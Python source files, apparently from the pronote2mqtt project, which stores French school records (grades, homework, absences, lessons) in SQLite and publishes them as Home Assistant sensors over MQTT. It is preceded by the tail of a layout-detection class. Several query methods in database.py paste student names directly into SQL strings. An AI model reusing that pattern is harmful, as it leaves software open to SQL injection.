cfg = self._config.get_cfg()
config_path = self._reconstruct_path_with_detector_name(config_path)
config_path = PathManager.get_local_path(config_path)
cfg.merge_from_file(config_path)
cfg.merge_from_list(extra_config)
if model_path is not None:
model_path = self._reconstruct_path_with_detector_name(model_path)
cfg.MODEL.WEIGHTS = model_path
cfg.MODEL.DEVICE = "cuda" if torch.cuda.is_available() else "cpu"
self.cfg = cfg
self.label_map = label_map
self._create_model()
def _reconstruct_path_with_detector_name(self, path: str) -> str:
"""This function will add the detector name (detectron2) into the
lp model config path to get the "canonical" model name.
For example, for a given config_path `lp://HJDataset/faster_rcnn_R_50_FPN_3x/config`,
it will transform it into `lp://detectron2/HJDataset/faster_rcnn_R_50_FPN_3x/config`.
However, if the config_path already contains the detector name, we won't change it.
This function is a general step to support multiple backends in the layout-parser
library.
Args:
path (str): The given input path that might or might not contain the detector name.
Returns:
str: a modified path that contains the detector name.
"""
if path.startswith("lp://"): # TODO: Move "lp://" to a constant
model_name = path[len("lp://") :]
model_name_segments = model_name.split("/")
if (
len(model_name_segments) == 3
and "detectron2" not in model_name_segments
):
return "lp://" + self.DETECTOR_NAME + "/" + path[len("lp://") :]
return path
def gather_output(self, outputs):
instance_pred = outputs["instances"].to("cpu")
layout = Layout()
scores = instance_pred.scores.tolist()
boxes = instance_pred.pred_boxes.tensor.tolist()
labels = instance_pred.pred_classes.tolist()
for score, box, label in zip(scores, boxes, labels):
x_1, y_1, x_2, y_2 = box
if self.label_map is not None:
label = self.label_map.get(label, label)
cur_block = TextBlock(
Rectangle(x_1, y_1, x_2, y_2), type=label, score=score
)
layout.append(cur_block)
return layout
def _create_model(self):
self.model = self._engine.DefaultPredictor(self.cfg)
def detect(self, image):
"""Detect the layout of a given image.
Args:
image (:obj:`np.ndarray` or `PIL.Image`): The input image to detect.
Returns:
:obj:`~layoutparser.Layout`: The detected layout of the input image
"""
# Convert PIL Image Input
if isinstance(image, Image.Image):
if image.mode != "RGB":
image = image.convert("RGB")
image = np.array(image)
outputs = self.model(image)
layout = self.gather_output(outputs)
return layout
``` |
{
"source": "jimsaye/pronote2mqtt",
"score": 2
} |
#### File: pronote2mqtt/app/database.py
```python
import sqlite3
import os
import logging
import datetime
import json
from dateutil.relativedelta import *
# Constants
DATABASE_NAME = "pronote2mqtt.db"
DATABASE_TIMEOUT = 10
DATABASE_DATE_FORMAT = "%Y-%m-%d"
DATABASE_DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S"
# Config constants
P2M_KEY = "p2m"
DB_KEY = "db"
LAST_EXEC_KEY = "last_exec_datetime"
# Convert datetime string to datetime
def _convertDate(dateString):
if dateString == None: return None
else:
myDateTime = datetime.datetime.strptime(dateString,DATABASE_DATE_FORMAT)
return myDateTime
def _convertDateTime(dateString):
if dateString == None:
return None
else:
myDateTime = datetime.datetime.strptime(dateString, DATABASE_DATETIME_FORMAT)
return myDateTime
# Class database
class Database:
# Constructor
def __init__(self,path):
self.con = None
self.cur = None
self.date = datetime.datetime.now().strftime('%Y-%m-%d')
self.p2mVersion = None
self.dbVersion = None
self.path = path
self.studentList = []
# Database initialization
def init(self,p2mVersion,dbVersion):
# Create table for configuration
logging.debug("Creation of config table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS config (
key TEXT NOT NULL
, value TEXT NOT NULL)''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_config_key
ON config (key)''')
## Create table of Students
logging.debug("Creation of Students table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS students (
sid TEXT
, fullname TEXT
, school TEXT
, class TEXT
, PRIMARY KEY (fullname))''')
## Create table of Periods
logging.debug("Creation of Period table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS periods (
pid TEXT
, studentname TEXT
, name TEXT
, start TEXT
, end TEXT
, PRIMARY KEY (studentname,name,start))''')
## Create table of grades
logging.debug("Creation of Grade table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS grades (
pid TEXT NOT NULL
, period_name TEXT
, period_start TEXT
, period_end TEXT
, gid TEXT
, studentname TEXT
, date TEXT
, subject TYPE TEXT
, grade TYPE TEXT
, out_of TYPE TEXT
, default_out_of TYPE TEXT
, coefficient TYPE TEXT
, average TYPE TEXT
, max TEXT
, min TEXT
, comment TYPE TEXT
, PRIMARY KEY (period_name,date,subject,comment))''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_grades_date
ON grades (period_name,date,subject,comment)''')
## Create table of averages
## pronote does not supply an id used period-id
logging.debug("Creation of Averages table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS averages (
pid TEXT NOT NULL
, period_name TEXT
, period_start TEXT
, period_end TEXT
, studentname TEXT NOT NULL
, student TEXT
, class_average TEXT
, max TYPE TEXT
, min TYPE TEXT
, out_of TYPE TEXT
, default_out_of TYPE TEXT
, subject TYPE TEXT NOT NULL
, PRIMARY KEY(period_name,studentname,subject))''')
# using key on period id and evalid
logging.debug("Creation of Evaluations table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS evaluations (
pid TEXT NOT NULL
, period_name TEXT
, period_start TEXT
, period_end TEXT
, studentname TEXT
, eid TEXT NOT NULL
, name TEXT
, domain TEXT
, teacher TEXT
, coefficient TEXT
, description TEXT
, subject TEXT
, date TEXT
, aid TEXT
, acquisition_name TEXT
, acquisition_level TEXT
, acquisition_coefficient TEXT
, PRIMARY KEY(period_name,studentname,subject,date,aid))''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_evaluations_aid
ON evaluations (period_name,studentname,subject,date,aid)''')
# using key on period id and evalid
logging.debug("Creation of Absences table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS absences (
pid TEXT NOT NULL
, period_name TEXT
, period_start TEXT
, period_end TEXT
, studentname TEXT
, abid TEXT NOT NULL
, from_date TEXT
, to_date TEXT
, justified TEXT
, hours TEXT
, days TEXT
, reasons TEXT
, PRIMARY KEY(period_name,studentname,from_date,reasons))''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_absences_pidabid
ON absences (period_name,studentname,from_date,reasons)''')
# using key on period id and evalid
logging.debug("Creation of Lessons table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS lessons (
lid TEXT NOT NULL
, studentname TEXT NOT NULL
, lessonDateTime TEXT
, lessonStart TEXT
, lessonEnd TEXT
, lessonSubject TEXT
, lessonRoom TEXT
, lessonCanceled TEXT
, lessonStatus TEXT
, PRIMARY KEY(studentname,lessonDateTime,lessonSubject,lessonRoom, lessonCanceled))''')
# self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_lessons_lid
# ON lessons (studentname,lessonDateTime,LessonSubject, lessonStatus)''')
# using key on period id and evalid
logging.debug("Creation of Homework table")
self.cur.execute('''CREATE TABLE IF NOT EXISTS homework (
hid TEXT NOT NULL
, studentname TEXT NOT NULL
, homeworkSubject TEXT
, homeworkDescription TEXT
, homeworkDone TEXT
, homeworkDate TEXT
, PRIMARY KEY(studentname,homeworkDate,homeworkSubject,homeworkDescription))''')
self.cur.execute('''CREATE UNIQUE INDEX IF NOT EXISTS idx_homework_hid
ON homework (studentname,homeworkDate,homeworkSubject,homeworkDescription)''')
# Commit
self.commit()
# Update configuration values
logging.debug("Store configuration")
self.updateVersion(P2M_KEY, p2mVersion)
self.updateVersion(DB_KEY, dbVersion)
self.updateVersion(LAST_EXEC_KEY, datetime.datetime.now())
# Commit
self.commit()
# Check that table exists
def existsTable(self,name):
query = "SELECT count(name) FROM sqlite_master WHERE type='table' AND name=?"
queryResult = None
try:
self.cur.execute(query,[name])
queryResult = self.cur.fetchall()
if queryResult is not None and queryResult[0][0] == 1:
return True
else:
return False
except Exception as e:
logging.error("Error when checking table : %s",e)
return False
# Update version
def updateVersion(self,key,value):
if self.existsTable("config"):
query = "INSERT OR REPLACE INTO config(key,value) VALUES(?,?)"
try:
self.cur.execute(query, [key,value])
logging.debug("Version of key %s with value %s updated successfully !", key, value)
except Exception as e:
logging.error("Error when updating config table : %s",e)
# Get version
def getConfig(self, key):
query = "SELECT value FROM config WHERE key = ?"
queryResult = None
try:
self.cur.execute(query,[key])
queryResult = self.cur.fetchone()
if queryResult is not None:
return queryResult[0]
else:
return None
except Exception as e:
logging.warning("Error retrieving version of key %s in config table %s", key, e)
return queryResult
# Connexion to database
    def connect(self,p2mVersion,dbVersion):
# Create directory if not exists
if not os.path.exists(self.path):
os.mkdir(self.path)
logging.debug("Directory %s created",self.path)
# Initialize database if not exists
if not os.path.exists(self.path + "/" + DATABASE_NAME):
logging.debug("Initialization of the SQLite database...")
self.con = sqlite3.connect(self.path + "/" + DATABASE_NAME, timeout=DATABASE_TIMEOUT)
self.cur = self.con.cursor()
            self.init(p2mVersion,dbVersion)
else:
logging.debug("Connexion to database")
self.con = sqlite3.connect(self.path + "/" + DATABASE_NAME, timeout=DATABASE_TIMEOUT)
self.cur = self.con.cursor()
    # Get grades statistics
def getGradesCount(self):
valueResult = {}
query = f"SELECT count(*), count(distinct period_start), count(distinct gid), min(period_start), max(period_start) FROM grades"
# to add to distinguish between students.....e.g. WHERE student = '{sid}'"
self.cur.execute(query)
queryResult = self.cur.fetchone()
if queryResult is not None:
if queryResult[0] is not None:
valueResult["rows"] = int(queryResult[0])
valueResult["dates"] = int(queryResult[1])
valueResult["gid"] = int(queryResult[2])
valueResult["minDate"] = queryResult[3]
valueResult["maxDate"] = queryResult[4]
return valueResult
# Re-initialize the database
def reInit(self,p2mVersion,dbVersion):
logging.debug("Reinitialization of the database.")
logging.debug("Drop configuration table")
self.cur.execute('''DROP TABLE IF EXISTS config''')
logging.debug("Drop Periods table")
self.cur.execute('''DROP TABLE IF EXISTS periods''')
logging.debug("Drop Grades table")
self.cur.execute('''DROP TABLE IF EXISTS grades''')
logging.debug("Drop Averages table")
self.cur.execute('''DROP TABLE IF EXISTS averages''')
logging.debug("Drop Evaluations table")
self.cur.execute('''DROP TABLE IF EXISTS evaluations''')
logging.debug("Drop Lessons table")
self.cur.execute('''DROP TABLE IF EXISTS lessons''')
logging.debug("Drop Homework table")
self.cur.execute('''DROP TABLE IF EXISTS homework''')
logging.debug("Drop Student table")
self.cur.execute('''DROP TABLE IF EXISTS students''')
logging.debug("Drop Absences table")
self.cur.execute('''DROP TABLE IF EXISTS absences''')
# Commit work
self.commit()
# Initialize tables
self.init(p2mVersion,dbVersion)
# Check if connected
def isConnected(self):
return self.cur
# Disconnect
def close(self):
logging.debug("Disconnexion of the database")
self.con.close()
# Commit work
def commit(self):
self.con.commit()
# Load
def load(self):
# Load Students
self._loadStudents()
#load Homework
for myStudent in self.studentList:
self._loadHomework(myStudent)
#load Evaluation
for myStudent in self.studentList:
self._loadEvaluationsShortList(myStudent)
#load Absence
for myStudent in self.studentList:
self._loadAbsenceShortList(myStudent)
#load Averages
for myStudent in self.studentList:
self._loadAverage(myStudent)
#load Grade
for myStudent in self.studentList:
self._loadGradesShortList(myStudent)
#load Lessons
for myStudent in self.studentList:
self._loadLessonsShortList(myStudent)
# Load students
def _loadStudents(self):
query = "SELECT * FROM students"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Student
for result in queryResult:
myStudent = Student(result)
self.studentList.append(myStudent)
# Load homework
def _loadHomework(self,student):
studentname=student.studentFullname
datestart = datetime.date.today().strftime("%Y/%m/%d")
dateend = datetime.date.today() + relativedelta(days=7)
dateend = dateend.strftime("%Y/%m/%d")
query = f"SELECT * FROM homework WHERE studentname = '{studentname}' and homeworkDate between '{datestart}' and '{dateend}' order by homeworkDate"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Homework
for result in queryResult:
myHomework = Homework(result)
student.homeworkList.append(myHomework)
def _loadEvaluationsShortList(self,student):
studentname=student.studentFullname
# not collecting all
datestart = datetime.date.today() - relativedelta(days=30)
datestart = datestart.strftime("%Y/%m/%d")
query = f"SELECT * FROM evaluations WHERE studentname like '{studentname}' and date >= '{datestart}' ORDER by date desc"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Eval
for result in queryResult:
myEvaluation = Evaluations(result)
student.evaluationShortList.append(myEvaluation)
def _loadAbsenceShortList(self,student):
studentname=student.studentFullname
# not collecting all
datestart = datetime.date.today() - relativedelta(days=30)
datestart = datestart.strftime("%Y/%m/%d %H:%M")
query = f"SELECT * FROM absences WHERE studentname like '{studentname}' and from_date >= '{datestart}' and period_name like 'Année continue'"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Absence
for result in queryResult:
myAbsence = Absences(result)
student.absenceShortList.append(myAbsence)
# Load averages
def _loadAverage(self,student):
studentname=student.studentFullname
# averages have been loaded for all periods but are the same for all periods, extracting only Yeardata
query = f"SELECT * FROM averages WHERE studentname like '{studentname}' and period_name like 'Année continue'"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Homework
for result in queryResult:
myAverage = Averages(result)
student.averageList.append(myAverage)
# Load grades
def _loadGradesShortList(self,student):
studentname=student.studentFullname
datestart = datetime.date.today() - relativedelta(days=30)
datestart = datestart.strftime("%Y/%m/%d")
query = f"SELECT * FROM grades WHERE studentname like '{studentname}' and date >= '{datestart}' and period_name like 'Année continue' ORDER by date desc"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Homework
for result in queryResult:
myGrade = Grades(result)
student.gradeList.append(myGrade)
# load lessons
def _loadLessonsShortList(self,student):
studentname=student.studentFullname
# not collecting all
datestart = datetime.date.today().strftime("%Y/%m/%d %H:%M")
dateend = datetime.date.today() + relativedelta(days=7)
dateend = dateend.strftime("%Y/%m/%d %H:%M")
query = f"SELECT * FROM lessons WHERE studentname like '{studentname}' and lessonDateTime between '{datestart}' and '{dateend}' ORDER by lessonDateTime"
self.cur.execute(query)
queryResult = self.cur.fetchall()
# Create object Eval
for result in queryResult:
myLesson = Lessons(result)
student.lessonShortList.append(myLesson)
# classes
class Grades():
def __init__(self,result):
self.pid = result[0]
self.period_name = result[1]
self.period_start = result[2]
self.period_end = result[3]
self.gid = result[4]
self.student = result[5]
self.date = result[6]
self.subject = result[7]
self.grade = result[8]
self.outOf = result[9]
self.defaultOutOf = result[10]
self.coefficient = result[11]
self.average = result[12]
self.max = result[13]
self.min = result[14]
self.comment = result[15]
class Averages():
def __init__(self,result):
self.pid = result[0]
self.period_name = result[1]
self.period_start = result[2]
self.period_end = result[3]
self.studentname = result[4]
self.studentAverage = result[5]
self.classAverage = result[6]
self.max = result[7]
self.min = result[8]
self.outOf = result[9]
self.defaultOutOf = result[10]
self.subject = result[11]
class Periods():
def __init__(self,result):
self.pid = result[0]
self.student = result[1]
self.periodName = result[2]
self.periodStart = result[3]
self.periodEnd = result[4]
class Evaluations():
def __init__(self,result):
self.pid = result[0]
self.period_name = result[1]
self.period_start = result[2]
self.period_end = result[3]
self.studentname = result[4]
self.eid = result[5]
self.evalName = result[6]
self.evalDomain = result[7]
self.evalTeacher = result[8]
self.evalCoefficient = result[9]
self.evalDescription = result[10]
self.evalSubject = result[11]
self.evalDate = result[12]
self.acqId = result[13]
self.acqName = result[14]
self.acqLevel = result[15]
self.acqCoefficient = result[16]
class Absences():
def __init__(self,result):
self.pid = result[0]
self.period_name = result[1]
self.period_start = result[2]
self.period_end = result[3]
self.studentname = result[4]
self.abid = result[5]
self.absenceFrom = result[6]
self.absenceTo = result[7]
self.absenceJustified = result[8]
self.absenceHours = result[9]
self.absenceDays = result[10]
self.absenceReasons = result[11]
class Lessons():
def __init__(self,result):
self.lid = result[0]
self.studentname = result[1]
self.lessonDateTime = result[2]
self.lessonStart = result[3]
self.lessonEnd = result[4]
self.lessonSubject = result[5]
self.lessonRoom = result[6]
self.lessonCanceled = result[7]
self.lessonStatus = result[8]
class Homework():
def __init__(self,result):
self.hid = result[0]
self.studentname = result[1]
self.homeworkSubject = result[2]
self.homeworkDescription = result[3]
self.homeworkDone = result[4]
self.homeworkDate = result[5]
class Student():
def __init__(self,result):
self.sid = result[0]
self.studentFullname = result[1]
self.studentSchool = result[2]
self.studentClass = result[3]
self.homeworkList = []
self.evaluationShortList = []
self.absenceShortList = []
self.averageList = []
self.gradeList = []
self.lessonShortList = []
```
#### File: pronote2mqtt/app/hass.py
```python
import json
import logging
# Constants
SENSOR = "sensor"
BINARY = "binary_sensor"
# Hass device class
PROBLEM_TYPE = "problem"
NONE_TYPE = None
# Hass state_class
# Hass Others
MANUFACTURER = "PRONOTE"
# Class Home assistant
class Hass:
# Constructor
def __init__(self,prefix):
self.prefix = prefix # discovery prefix
self.deviceList = []
def addDevice(self,device):
self.deviceList.append(device)
return device
# Class Home assistant Device
class Device:
# Constructor
def __init__(self,hass,studentId,deviceId, deviceName):
self.hass = hass
self.id = deviceId
self.name = deviceName
self.entityList = []
self.configPayload = {
"identifiers": [self.id],
"name": self.name,
"model": studentId,
"manufacturer": MANUFACTURER
}
# Add device to hass
hass.addDevice(self)
# Add entity
def addEntity(self,entity):
self.entityList.append(entity)
# Return the state payload of all entities of the device
def getStatePayload(self):
# Init payload
payload = {}
# Map each entity's config/state/attributes topic to its payload
for myEntity in self.entityList:
payload[myEntity.configTopic] = myEntity.getConfigPayloadJson()
if myEntity.value is not None:
payload[myEntity.stateTopic] = myEntity.value
if myEntity.attributes:
payload[myEntity.attributesTopic] = myEntity.getAttribute()
# Return json formatted
return payload
# Class Home assistant Entity
class Entity:
# Constructor
def __init__(self,device,type,id,name,deviceClass=None,stateClass=None,unit=None):
logging.debug("Initialise hass device %s",id)
# Variables
self.device = device
self.type = type
self.id = id
self.name = name
self.deviceClass = deviceClass
self.stateClass = stateClass
self.unit = unit
self.statePayload = None
self.value = None
self.attributes = {}
# Set topics
self.configTopic = f"{self.device.hass.prefix}/{type}/{self.device.id}/{self.id}/config"
self.stateTopic = f"{self.device.hass.prefix}/{type}/{self.device.id}/{self.id}/state"
self.attributesTopic = f"{self.device.hass.prefix}/{type}/{self.device.id}/{self.id}/attributes"
# Set config payload
self.configPayload = {}
if self.deviceClass is not None:
self.configPayload["device_class"] = self.deviceClass
if self.stateClass is not None:
self.configPayload["state_class"] = self.stateClass
self.configPayload["name"] = f"{self.device.name} {self.name}"
self.configPayload["unique_id"] = f"{self.device.id}_{self.id}"
self.configPayload["state_topic"] = self.stateTopic
self.configPayload["json_attributes_topic"] = f"{self.attributesTopic}"
self.configPayload["device"] = self.device.configPayload
# Add entity to device
self.device.addEntity(self)
# Return config payload in Json format
def getConfigPayloadJson(self):
return json.dumps(self.configPayload)
# Set state value
def setValue(self,value):
self.value = value
# Add attributes
def addAttribute(self,key,value):
self.attributes[key] = value
# Replace the whole attributes dict at once
def addAttributej(self,value):
self.attributes = value
# Get attributes payload
def getAttribute(self):
return json.dumps(self.attributes)
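# Illustrative wiring of the classes above (all identifiers below are made up
# for this sketch, they are not part of pronote2mqtt):
# myHass = Hass("homeassistant")
# myDevice = Device(myHass, "student-1", "pronote_demo", "Pronote Demo")
# myEntity = Entity(myDevice, SENSOR, "homework", "homework")
# myEntity.setValue("Jane Doe")
# myEntity.addAttribute("date", ["2021/09/01"])
# myDevice.getStatePayload() then maps each config/state/attributes topic to
# the payload that gets published over MQTT.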
```
#### File: pronote2mqtt/app/pronote2mqtt.py
```python
import sys
import datetime
import schedule
import time
from dateutil.relativedelta import relativedelta
import logging
import collections
import re
import mqtt
import hass
import param
import database
import traceback
#imports for pronotepy
import pronotepy
import os
from datetime import date
from datetime import timedelta
import json
import pronote
# pronote2mqtt constants
P2M_VERSION = '0.1.0'
P2M_DB_VERSION = '0.1.0'
#######################################################################
#### Functions
#######################################################################
# Sub to get date with year offset
def _getYearOfssetDate(day, number):
return day - relativedelta(years=number)
# Sub to return format wanted
def _dateTimeToStr(datetime):
return datetime.strftime("%d/%m/%Y - %H:%M:%S")
########################################################################################################################
#### Running program
########################################################################################################################
def run(myParams):
myMqtt = None
myPronote = None
# Store time now
dtn = _dateTimeToStr(datetime.datetime.now())
# STEP 1 : Connect to database
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Connexion to SQLite database #")
logging.info("-----------------------------------------------------------")
# Create/Update database
logging.info("Connexion to SQLite database...")
myDb = database.Database(myParams.dbPath)
# Connect to database
myDb.connect(P2M_VERSION,P2M_DB_VERSION)
if myDb.isConnected() :
logging.info("SQLite database connected !")
else:
logging.error("Unable to connect to SQLite database.")
# Check program version
p2mVersion = myDb.getConfig(database.P2M_KEY)
p2mDate = myDb.getConfig(database.LAST_EXEC_KEY)
logging.info("Last execution date %s, program was in version %s.",p2mDate,p2mVersion)
if p2mVersion != P2M_VERSION:
logging.warning("pronote2mqtt version (%s) has changed since last execution (%s)",P2M_VERSION,p2mVersion)
# Update program version
myDb.updateVersion(database.P2M_KEY,P2M_VERSION)
myDb.commit()
# Reinit database when required :
if myParams.dbInit:
logging.info("Reinitialization of the database...")
myDb.reInit(P2M_VERSION,P2M_DB_VERSION)
logging.info("Database reinitialized to version %s",P2M_DB_VERSION)
else:
# Compare database version
logging.info("Checking database version...")
dbVersion = myDb.getConfig(database.DB_KEY)
if dbVersion == P2M_DB_VERSION:
logging.info("Your database is already up to date : version %s.",P2M_DB_VERSION)
# Display some (!) current database statistics
logging.info("Retrieve database statistics...")
dbStats = myDb.getGradesCount()
logging.info("%s informatives grades stored", dbStats["rows"])
logging.info("%s Grade(s)", dbStats["gid"])
logging.info("First grade : %s", dbStats["minDate"])
logging.info("Last grade : %s", dbStats["maxDate"])
else:
logging.warning("Your database (version %s) is not up to date.",dbVersion)
logging.info("Reinitialization of your database to version %s...",P2M_DB_VERSION)
myDb.reInit(P2M_VERSION,P2M_DB_VERSION)
dbVersion = myDb.getConfig(database.DB_KEY)
logging.info("Database reinitialized to version %s !",dbVersion)
####################################################################################################################
# STEP 1 : Collect data from pronote
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Collection from Pronote #")
logging.info("-----------------------------------------------------------")
myPronote = pronote.Pronote()
#Kick off for Student 1
logging.info("Student 1-----------------------------------------------------")
myPronote.getData(myParams.pronotePrefixUrl_1,myParams.pronoteUsername_1,myParams.pronotePassword_1,myParams.pronoteCas_1,myParams.pronoteGradesAverages_1)
if myParams.pronoteGradesAverages_1:
for myAverage in myPronote.averageList:
myAverage.store(myDb)
for myGrade in myPronote.gradeList:
myGrade.store(myDb)
for myPeriod in myPronote.periodList:
myPeriod.store(myDb)
if not myParams.pronoteGradesAverages_1:
for myEval in myPronote.evalList:
myEval.store(myDb)
for myLesson in myPronote.lessonList:
myLesson.store(myDb)
for myHomework in myPronote.homeworkList:
myHomework.store(myDb)
for myStudent in myPronote.studentList:
myStudent.store(myDb)
for myAbsence in myPronote.absenceList:
myAbsence.store(myDb)
myDb.commit()
#Kick off for Student 2
if myParams.pronoteUsername_2:
logging.info("Student 2-----------------------------------------------------")
myPronote.getData(myParams.pronotePrefixUrl_2,myParams.pronoteUsername_2,myParams.pronotePassword_2,myParams.pronoteCas_2,myParams.pronoteGradesAverages_2)
if myParams.pronoteGradesAverages_2:
for myAverage in myPronote.averageList:
myAverage.store(myDb)
for myGrade in myPronote.gradeList:
myGrade.store(myDb)
for myPeriod in myPronote.periodList:
myPeriod.store(myDb)
if not myParams.pronoteGradesAverages_2:
for myEval in myPronote.evalList:
myEval.store(myDb)
for myLesson in myPronote.lessonList:
myLesson.store(myDb)
for myHomework in myPronote.homeworkList:
myHomework.store(myDb)
for myStudent in myPronote.studentList:
myStudent.store(myDb)
for myAbsence in myPronote.absenceList:
myAbsence.store(myDb)
myDb.commit()
####################################################################################################################
# STEP 2 : Connect to MQTT
####################################################################################################################
####################################################################################################################
logging.info("-----------------------------------------------------------")
logging.info("# Connexion to Mqtt broker #")
logging.info("-----------------------------------------------------------")
try:
logging.info("Connect to Mqtt broker...")
# Create mqtt client
myMqtt = mqtt.Mqtt(myParams.mqttClientId,myParams.mqttUsername,myParams.mqttPassword,myParams.mqttSsl,myParams.mqttQos,myParams.mqttRetain)
# Connect mqtt broker
myMqtt.connect(myParams.mqttHost,myParams.mqttPort)
# Wait for connexion callback
time.sleep(2)
if myMqtt.isConnected:
logging.info("Mqtt broker connected !")
except:
logging.error("Unable to connect to Mqtt broker. Please check that broker is running, or check broker configuration.")
####################################################################################################################
# STEP 3 : Home Assistant sensors load/create from dB
####################################################################################################################
if myMqtt.isConnected \
and myParams.hassDiscovery :
try:
logging.info("-----------------------------------------------------------")
logging.info("# Home assistant sensor #")
logging.info("-----------------------------------------------------------")
# Create hass instance
myHass = hass.Hass(myParams.hassPrefix)
#load data from dB
myDb.load()
# Loop on students
for myStudent in myDb.studentList:
logging.info("Publishing period values of Students %s alias %s...", myStudent.sid, myStudent.studentFullname)
logging.info("---------------------------------")
# Create the device corresponding to the user
deviceId = myParams.hassDeviceName.replace(" ","_") + "_" + myStudent.studentFullname.replace(" ","_")
deviceName = myParams.hassDeviceName + " " + myStudent.studentFullname
myDevice = hass.Device(myHass,myStudent.sid,deviceId,deviceName)
# Create entity Student
logging.info("Creation of the Student entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'student','student',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
myEntity.addAttribute("school",myStudent.studentSchool)
myEntity.addAttribute("current_class",myStudent.studentClass)
# create homework sensor
logging.info("Creation of the HOMEWORK entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'homework','homework',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
attributes = {}
if myStudent.homeworkList:
logging.info("Collecting and Publishing values Homework...")
logging.info("---------------------------------")
attributes[f'date'] = []
attributes[f'title'] = []
attributes[f'description'] = []
attributes[f'done'] = []
for myHomework in myStudent.homeworkList:
# Store homework into sensor
attributes[f'date'].append(myHomework.homeworkDate)
attributes[f'title'].append(myHomework.homeworkSubject)
attributes[f'description'].append(re.sub(r'http\S+', '<URL REMOVED, see PRONOTE-APP>', myHomework.homeworkDescription))
attributes[f'done'].append(myHomework.homeworkDone)
myEntity.addAttribute("date",attributes[f'date'])
myEntity.addAttribute("title",attributes[f'title'])
myEntity.addAttribute("description",attributes[f'description'])
myEntity.addAttribute("done",attributes[f'done'])
logging.info("Homework added to HA sensor !")
# create evaluation sensor
logging.info("Creation of the EVALUATION/Acquisitions entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'evaluation','evaluation',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
logging.info("Collecting and Publishing values Evaluation from shortlist (last x days)...")
attributes = {}
if myStudent.evaluationShortList:
logging.info("Collecting and Publishing values Evaluation from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'date'] = []
attributes[f'subject'] = []
attributes[f'acquisition_name'] = []
attributes[f'acquisition_level'] = []
for myEvaluation in myStudent.evaluationShortList:
# Store evaluation into sensor
attributes[f'date'].append(myEvaluation.evalDate)
attributes[f'subject'].append(myEvaluation.evalSubject)
attributes[f'acquisition_name'].append(myEvaluation.acqName)
attributes[f'acquisition_level'].append(myEvaluation.acqLevel)
myEntity.addAttribute("date",attributes[f'date'])
myEntity.addAttribute("subject",attributes[f'subject'])
myEntity.addAttribute("acquisition_name",attributes[f'acquisition_name'])
myEntity.addAttribute("acquisition_level",attributes[f'acquisition_level'])
logging.info("Evaluation added to HA sensor !")
# create absences sensor
logging.info("Creation of the Absences entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'absence','absence',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
logging.info("Collecting and Publishing values Absences from shortlist (last x days)...")
attributes = {}
if myStudent.absenceShortList:
logging.info("Collecting and Publishing values Absence from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'from_date'] = []
attributes[f'hours'] = []
attributes[f'justified'] = []
attributes[f'reasons'] = []
for myAbsence in myStudent.absenceShortList:
# Store evaluation into sensor
attributes[f'from_date'].append(myAbsence.absenceFrom.split("/",1)[1])
attributes[f'hours'].append(myAbsence.absenceHours)
attributes[f'justified'].append(myAbsence.absenceJustified)
attributes[f'reasons'].append(myAbsence.absenceReasons)
myEntity.addAttribute("date",attributes[f'from_date'])
myEntity.addAttribute("hours",attributes[f'hours'])
myEntity.addAttribute("justified",attributes[f'justified'])
myEntity.addAttribute("reason",attributes[f'reasons'])
logging.info("Absence added to HA sensor !")
# create averages sensor
logging.info("Creation of the Averages entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'average','average',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
logging.info("Collecting and Publishing values Averages from shortlist (last x days)...")
attributes = {}
if myStudent.averageList:
logging.info("Collecting and Publishing values Average from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'subject'] = []
attributes[f'student_average'] = []
attributes[f'class_average'] = []
attributes[f'max'] = []
attributes[f'min'] = []
for myAverage in myStudent.averageList:
# Store evaluation into sensor
attributes[f'subject'].append(myAverage.subject)
attributes[f'student_average'].append(myAverage.studentAverage)
attributes[f'class_average'].append(myAverage.classAverage)
attributes[f'max'].append(myAverage.max)
attributes[f'min'].append(myAverage.min)
myEntity.addAttribute("subject",attributes[f'subject'])
myEntity.addAttribute("student_average",attributes[f'student_average'])
myEntity.addAttribute("class_average",attributes[f'class_average'])
myEntity.addAttribute("max",attributes[f'max'])
myEntity.addAttribute("min",attributes[f'min'])
logging.info("Average added to HA sensor !")
# create grades sensor
logging.info("Creation of the Grades entity")
myEntity = hass.Entity(myDevice,hass.SENSOR,'grade','grade',hass.NONE_TYPE,None,None)
myEntity.setValue(myStudent.studentFullname)
logging.info("Collecting and Publishing values Grades from shortlist (last x days)...")
attributes = {}
if myStudent.gradeList:
logging.info("Collecting and Publishing values Grades from shortlist (last x days)...")
logging.info("---------------------------------")
attributes[f'date'] = []
attributes[f'subject'] = []
attributes[f'student_grade'] = []
